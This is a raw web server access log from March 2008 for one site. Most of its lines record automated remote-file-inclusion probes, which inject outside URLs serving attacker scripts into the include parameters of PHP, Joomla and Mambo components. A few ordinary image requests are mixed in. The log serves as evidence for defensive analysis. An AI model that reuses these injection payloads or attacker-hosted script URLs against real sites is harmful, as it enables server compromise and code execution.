80.237.153.23 - - [25/Mar/2008:05:52:25 -0700] "GET /logs/access_080201.log//config.php?inc_dir=http://yoga0400.org/injek2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
80.237.153.23 - - [25/Mar/2008:05:52:26 -0700] "GET /logs//config.php?inc_dir=http://yoga0400.org/injek2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
194.146.225.109 - - [25/Mar/2008:05:53:02 -0700] "GET /logs/access_080220.log/homepage.php?sel=http://www.rayzorowns.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
194.146.225.109 - - [25/Mar/2008:05:53:02 -0700] "GET /homepage.php?sel=http://www.rayzorowns.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
194.146.225.109 - - [25/Mar/2008:05:53:03 -0700] "GET /logs/homepage.php?sel=http://www.rayzorowns.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.237.153.23 - - [25/Mar/2008:05:53:10 -0700] "GET /logs/access_080131.log//config.php?inc_dir=http://yoga0400.org/injek2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
80.237.153.23 - - [25/Mar/2008:05:53:11 -0700] "GET /logs/access_080131.log//config.php?inc_dir=http://yoga0400.org/injek2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
62.189.126.85 - - [25/Mar/2008:05:53:12 -0700] "GET /logs/access.log/homepage.php?sel=http://xdengue01.iespana.es/bds/sefe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.189.126.85 - - [25/Mar/2008:05:53:12 -0700] "GET /logs/homepage.php?sel=http://xdengue01.iespana.es/bds/sefe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
61.109.250.188 - - [25/Mar/2008:05:53:53 -0700] "GET /logs/access_080215.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.tecnicsuport.com/dades/gestiobanners/special.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.109.250.188 - - [25/Mar/2008:05:53:54 -0700] "GET //index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.tecnicsuport.com/dades/gestiobanners/special.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.109.250.188 - - [25/Mar/2008:05:53:54 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.tecnicsuport.com/dades/gestiobanners/special.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
194.146.225.109 - - [25/Mar/2008:05:54:01 -0700] "GET /logs/access_080216.log/homepage.php?sel=http://www.rayzorowns.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.36.241.244 - - [25/Mar/2008:05:54:08 -0700] "GET /index.php?option=com_puarcade&Itemid=&mosConfig_absolute_path=http://www.woopss.de/conf/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.16.16.208 - - [25/Mar/2008:05:54:17 -0700] "GET /logs/access_080220.log/homepage.php?sel=http://www.rayzorowns.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.16.16.208 - - [25/Mar/2008:05:54:17 -0700] "GET /homepage.php?sel=http://www.rayzorowns.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.16.16.208 - - [25/Mar/2008:05:54:18 -0700] "GET /logs/homepage.php?sel=http://www.rayzorowns.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.16.16.208 - - [25/Mar/2008:05:54:18 -0700] "GET /logs/access_080216.log/homepage.php?sel=http://www.rayzorowns.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.108.66.169 - - [25/Mar/2008:05:54:23 -0700] "GET /logs/access.log//config.php?inc_dir=http://yoga0400.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.66.169 - - [25/Mar/2008:05:54:23 -0700] "GET /logs/access.log//config.php?inc_dir=http://yoga0400.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.66.169 - - [25/Mar/2008:05:54:23 -0700] "GET /logs//config.php?inc_dir=http://yoga0400.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.66.169 - - [25/Mar/2008:05:54:23 -0700] "GET /logs//config.php?inc_dir=http://yoga0400.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.19.18.66 - - [25/Mar/2008:05:54:31 -0700] "GET /logs/access_071211.log/db.php?path_local=http://www.lankawe.com/ioncube/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
198.253.49.6 - - [25/Mar/2008:05:55:23 -0700] "GET /bikes/dteel/EQ2/Screenshots/EQ2_000281.jpg HTTP/1.1" 200 812848 "http://gotla.guildportal.com/Guild.aspx?GuildID=80731&TabID=695681" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; InfoPath.2)" "www.dmulk.com"
203.157.182.9 - - [25/Mar/2008:05:56:23 -0700] "GET /logs/access_071229.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://ezsm.ru/media/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.157.182.9 - - [25/Mar/2008:05:56:27 -0700] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://ezsm.ru/media/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.148.95.154 - - [25/Mar/2008:05:56:59 -0700] "GET /homepage.php?sel=http://www.rayzorowns.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
61.109.250.188 - - [25/Mar/2008:05:59:15 -0700] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.tecnicsuport.com/dades/gestiobanners/special.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.67.217.154 - - [25/Mar/2008:05:59:30 -0700] "GET /logs/tools/send_reminders.php?noSet=0&includedir=http://www.jbwc.or.kr/bbs/skin/zero_vote/data/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
209.67.217.154 - - [25/Mar/2008:05:59:30 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.jbwc.or.kr/bbs/skin/zero_vote/data/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
69.42.217.194 - - [25/Mar/2008:06:00:30 -0700] "GET //modules/4nAlbum/public/displayCategory.php?basepath=http://owell.us/bo.do?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "www.dmulk.com"
69.42.217.194 - - [25/Mar/2008:06:00:30 -0700] "GET /logs//modules/4nAlbum/public/displayCategory.php?basepath=http://owell.us/bo.do?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "www.dmulk.com"
75.126.94.66 - - [25/Mar/2008:06:01:03 -0700] "GET /logs/access_080215.log//ultrastats/include/functions_common.php?gl_root_path=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
75.126.94.66 - - [25/Mar/2008:06:01:04 -0700] "GET //ultrastats/include/functions_common.php?gl_root_path=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
87.230.15.10 - - [25/Mar/2008:06:01:06 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=ftp://84.32.137.157/incoming/upload/trem/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.51.195.10 - - [25/Mar/2008:06:01:38 -0700] "GET //newspublish/include.php?path%5Bdocroot%5D=http://kaizo.hut2.ru/new/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.dmulk.com"
72.36.235.74 - - [25/Mar/2008:06:04:01 -0700] "GET /index.php?option=com_puarcade&Itemid=&mosConfig_absolute_path=http://www.dominpe.com/images/echo2? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.230.15.10 - - [25/Mar/2008:06:05:17 -0700] "GET /logs/access.log/lang.php?subpage=ftp://84.32.137.157/incoming/upload/trem/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.230.15.10 - - [25/Mar/2008:06:05:17 -0700] "GET /lang.php?subpage=ftp://84.32.137.157/incoming/upload/trem/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.230.15.10 - - [25/Mar/2008:06:05:18 -0700] "GET /logs/lang.php?subpage=ftp://84.32.137.157/incoming/upload/trem/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.35.0.230 - - [25/Mar/2008:06:05:53 -0700] "GET /index.php?option=com_puarcade&Itemid=&mosConfig_absolute_path=http://www.woopss.de/conf/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
203.157.182.9 - - [25/Mar/2008:06:06:10 -0700] "GET /logs/access_080211.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://ezsm.ru/media/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.21.223.90 - - [25/Mar/2008:06:06:36 -0700] "GET /logs/access_080218.log//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.apfinanz.de/components/com_artlinks/memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.237.153.23 - - [25/Mar/2008:06:06:47 -0700] "GET /logs/access_080201.log/index.php?inc_dir=http://yoga0400.org/injek2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
66.7.207.104 - - [25/Mar/2008:06:07:04 -0700] "GET //components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT[LIB_DIR]=http://www.lankawe.com/ioncube/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.35.0.230 - - [25/Mar/2008:06:08:02 -0700] "GET /logs/access_080124.log/administrator/components/com_mosmedia/includes/info.html.php?mosConfig_absolute_path=http://www.woopss.de/conf/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.193.224.20 - - [25/Mar/2008:06:08:07 -0700] "GET /index1.php?menu=http://www.defacerz.org/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.193.224.20 - - [25/Mar/2008:06:08:53 -0700] "GET /logs/access_080127.log/index1.php?menu=http://www.defacerz.org/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.6.29.87 - - [25/Mar/2008:06:09:01 -0700] "GET /bikes/dteel/140CANON/?S=D HTTP/1.0" 200 971 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
217.148.95.154 - - [25/Mar/2008:06:10:12 -0700] "GET /logs/access.log/index1.php?menu=http://www.rayzorowns.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
217.148.95.154 - - [25/Mar/2008:06:10:13 -0700] "GET /index1.php?menu=http://www.rayzorowns.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
217.148.95.154 - - [25/Mar/2008:06:10:13 -0700] "GET /logs/index1.php?menu=http://www.rayzorowns.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
72.29.70.163 - - [25/Mar/2008:06:11:10 -0700] "GET /logs/access_071216.log///modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.doggypost.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.29.70.163 - - [25/Mar/2008:06:11:10 -0700] "GET ///modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.doggypost.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.29.70.163 - - [25/Mar/2008:06:11:10 -0700] "GET /logs///modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.doggypost.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
217.148.95.154 - - [25/Mar/2008:06:11:28 -0700] "GET /logs/access_080127.log/index1.php?menu=http://www.rayzorowns.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
194.146.225.109 - - [25/Mar/2008:06:11:35 -0700] "GET /logs/access_080127.log/index1.php?menu=http://www.rayzorowns.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.189.126.85 - - [25/Mar/2008:06:11:45 -0700] "GET /logs/access_080220.log/homepage.php?sel=http://xdengue01.iespana.es/bds/sefe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
204.92.87.157 - - [25/Mar/2008:06:11:50 -0700] "GET //modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.lankawe.com/ioncube/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
202.142.220.42 - - [25/Mar/2008:06:11:54 -0700] "GET //modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://216.191.16.12/.shell/site/iyes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.36.241.244 - - [25/Mar/2008:06:12:08 -0700] "GET /logs/index.php?option=com_puarcade&Itemid=&mosConfig_absolute_path=http://www.woopss.de/conf/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.36.241.244 - - [25/Mar/2008:06:12:11 -0700] "GET /logs/access_080120.log/index.php?option=com_puarcade&Itemid=&mosConfig_absolute_path=http://www.woopss.de/conf/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.21.223.90 - - [25/Mar/2008:06:13:20 -0700] "GET /logs/access_080207.log//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.apfinanz.de/components/com_artlinks/memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.21.223.90 - - [25/Mar/2008:06:13:23 -0700] "GET //modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.apfinanz.de/components/com_artlinks/memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.21.223.90 - - [25/Mar/2008:06:13:25 -0700] "GET /logs//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.apfinanz.de/components/com_artlinks/memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
138.163.0.44 - - [25/Mar/2008:06:14:00 -0700] "GET /bikes/dteel/EQ2/Screenshots/EQ2_000295.jpg HTTP/1.0" 200 828304 "http://gotla.guildportal.com/Guild.aspx?GuildID=80731&TabID=695681" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)" "www.dmulk.com"
138.163.0.43 - - [25/Mar/2008:06:14:00 -0700] "GET /bikes/dteel/EQ2/Screenshots/EQ2_000300.jpg HTTP/1.0" 200 913443 "http://gotla.guildportal.com/Guild.aspx?GuildID=80731&TabID=695681" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)" "www.dmulk.com"
138.163.0.42 - - [25/Mar/2008:06:14:01 -0700] "GET /bikes/dteel/EQ2/Screenshots/EQ2_000299.jpg HTTP/1.0" 200 927196 "http://gotla.guildportal.com/Guild.aspx?GuildID=80731&TabID=695681" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)" "www.dmulk.com"
138.163.0.44 - - [25/Mar/2008:06:14:01 -0700] "GET /bikes/dteel/EQ2/Screenshots/EQ2_000281.jpg HTTP/1.0" 200 812848 "http://gotla.guildportal.com/Guild.aspx?GuildID=80731&TabID=695681" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)" "www.dmulk.com"
138.163.0.43 - - [25/Mar/2008:06:14:02 -0700] "GET /bikes/dteel/EQ2/Screenshots/EQ2_000292.jpg HTTP/1.0" 200 842640 "http://gotla.guildportal.com/Guild.aspx?GuildID=80731&TabID=695681" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)" "www.dmulk.com"
217.16.16.208 - - [25/Mar/2008:06:14:05 -0700] "GET /logs/access_080127.log/index1.php?menu=http://www.rayzorowns.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.16.16.208 - - [25/Mar/2008:06:14:06 -0700] "GET /index1.php?menu=http://www.rayzorowns.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.16.16.208 - - [25/Mar/2008:06:14:06 -0700] "GET /logs/index1.php?menu=http://www.rayzorowns.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
138.163.0.43 - - [25/Mar/2008:06:14:08 -0700] "GET /bikes/dteel/EQ2/Screenshots/EQ2_000299.jpg HTTP/1.0" 304 - "http://gotla.guildportal.com/Guild.aspx?GuildID=80731&TabID=695681" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)" "www.dmulk.com"
138.163.0.43 - - [25/Mar/2008:06:14:08 -0700] "GET /bikes/dteel/EQ2/Screenshots/EQ2_000300.jpg HTTP/1.0" 304 - "http://gotla.guildportal.com/Guild.aspx?GuildID=80731&TabID=695681" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)" "www.dmulk.com"
138.163.0.44 - - [25/Mar/2008:06:14:08 -0700] "GET /bikes/dteel/EQ2/Screenshots/EQ2_000295.jpg HTTP/1.0" 304 - "http://gotla.guildportal.com/Guild.aspx?GuildID=80731&TabID=695681" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)" "www.dmulk.com"
138.163.0.43 - - [25/Mar/2008:06:14:08 -0700] "GET /bikes/dteel/EQ2/Screenshots/EQ2_000292.jpg HTTP/1.0" 304 - "http://gotla.guildportal.com/Guild.aspx?GuildID=80731&TabID=695681" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)" "www.dmulk.com"
138.163.0.43 - - [25/Mar/2008:06:14:08 -0700] "GET /bikes/dteel/EQ2/Screenshots/EQ2_000281.jpg HTTP/1.0" 304 - "http://gotla.guildportal.com/Guild.aspx?GuildID=80731&TabID=695681" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)" "www.dmulk.com"
217.16.16.208 - - [25/Mar/2008:06:14:10 -0700] "GET /logs/access_080127.log/index1.php?menu=http://www.rayzorowns.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
72.29.70.163 - - [25/Mar/2008:06:14:10 -0700] "GET /logs/access_080124.log///modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.doggypost.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.29.70.163 - - [25/Mar/2008:06:14:10 -0700] "GET ///modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.doggypost.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
217.16.16.208 - - [25/Mar/2008:06:14:10 -0700] "GET /index1.php?menu=http://www.rayzorowns.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
72.29.70.163 - - [25/Mar/2008:06:14:11 -0700] "GET /logs///modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.doggypost.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
217.16.16.208 - - [25/Mar/2008:06:14:11 -0700] "GET /logs/index1.php?menu=http://www.rayzorowns.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
72.29.70.163 - - [25/Mar/2008:06:14:12 -0700] "GET /logs/access_080119.log///modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.doggypost.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.52.2.130 - - [25/Mar/2008:06:14:18 -0700] "GET /logs/access_080118.log/index.php?option=com_puarcade&Itemid=&mosConfig_absolute_path=http://www.dominpe.com/images/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.52.2.130 - - [25/Mar/2008:06:14:18 -0700] "GET /logs/index.php?option=com_puarcade&Itemid=&mosConfig_absolute_path=http://www.dominpe.com/images/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.52.2.130 - - [25/Mar/2008:06:14:22 -0700] "GET /logs/access_080120.log/index.php?option=com_puarcade&Itemid=&mosConfig_absolute_path=http://www.dominpe.com/images/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.67.217.154 - - [25/Mar/2008:06:14:53 -0700] "GET /logs/tools/send_reminders.php?noSet=0&includedir=http://www.jbwc.or.kr/bbs/skin/zero_vote/data/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
209.67.217.154 - - [25/Mar/2008:06:14:53 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.jbwc.or.kr/bbs/skin/zero_vote/data/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
88.198.21.196 - - [25/Mar/2008:06:14:54 -0700] "GET /logs/access_071109.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://bmcbeth.com/data/tmp/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.16.16.208 - - [25/Mar/2008:06:14:54 -0700] "GET /logs/access_080207.log/index1.php?menu=http://www.rayzorowns.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
88.198.21.196 - - [25/Mar/2008:06:14:56 -0700] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://bmcbeth.com/data/tmp/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.225.214.179 - - [25/Mar/2008:06:14:56 -0700] "GET //?mosConfig_absolute_path=http://www.elka.pw.edu.pl/ktmlpro/includes/ktedit/mic22?? HTTP/1.1" 200 3094 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
66.225.214.179 - - [25/Mar/2008:06:14:56 -0700] "GET /logs//?mosConfig_absolute_path=http://www.elka.pw.edu.pl/ktmlpro/includes/ktedit/mic22?? HTTP/1.1" 200 40268 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
88.198.21.196 - - [25/Mar/2008:06:14:56 -0700] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://bmcbeth.com/data/tmp/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.16.16.208 - - [25/Mar/2008:06:14:57 -0700] "GET /logs/access_080207.log/index1.php?menu=http://www.rayzorowns.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
138.163.0.42 - - [25/Mar/2008:06:14:59 -0700] "GET /bikes/dteel/EQ2/Fraaxia_thumb.jpg HTTP/1.0" 200 26169 "http://gotla.guildportal.com/Guild.aspx?GuildID=80731&ForumID=375442&TabID=695682&TopicID=5568217" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)" "www.dmulk.com"
202.142.220.42 - - [25/Mar/2008:06:15:53 -0700] "GET /logs/access_080120.log//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://216.191.16.12/.shell/site/iyes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.193.224.20 - - [25/Mar/2008:06:16:11 -0700] "GET /index1.php?menu=http://www.backhuys.nl/.../cgibin.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
88.198.21.196 - - [25/Mar/2008:06:16:17 -0700] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://bmcbeth.com/data/tmp/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
138.163.0.42 - - [25/Mar/2008:06:16:33 -0700] "GET /bikes/dteel/EQ2/Fraaxia_thumb.jpg HTTP/1.0" 304 - "http://gotla.guildportal.com/Guild.aspx?GuildID=80731&TabID=695682&ForumID=375442&TopicID=5568217" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)" "www.dmulk.com"
202.142.220.42 - - [25/Mar/2008:06:16:43 -0700] "GET //modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://216.191.16.12/.shell/site/iyes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.193.224.20 - - [25/Mar/2008:06:17:09 -0700] "GET /index1.php?menu=http://www.koreacarcare.com/becommunity/conf/temp/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.239.121.190 - - [25/Mar/2008:06:17:24 -0700] "GET //modules/TotalCalendar/about.php?inc_dir=http://acme-superstore.com/mlm/test1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.189.126.85 - - [25/Mar/2008:06:17:26 -0700] "GET /index1.php?menu=http://xdengue01.iespana.es/bds/sefe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.225.216.125 - - [25/Mar/2008:06:17:38 -0700] "GET /logs/access_080211.log/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.rayzorowns.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.225.216.125 - - [25/Mar/2008:06:17:39 -0700] "GET /modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.rayzorowns.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.225.216.125 - - [25/Mar/2008:06:17:39 -0700] "GET /logs/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.rayzorowns.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
87.230.15.10 - - [25/Mar/2008:06:17:55 -0700] "GET /logs/access_080215.log//modules/vwar/admin/admin.php?vwar_root=ftp://84.32.137.157/incoming/upload/trem/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
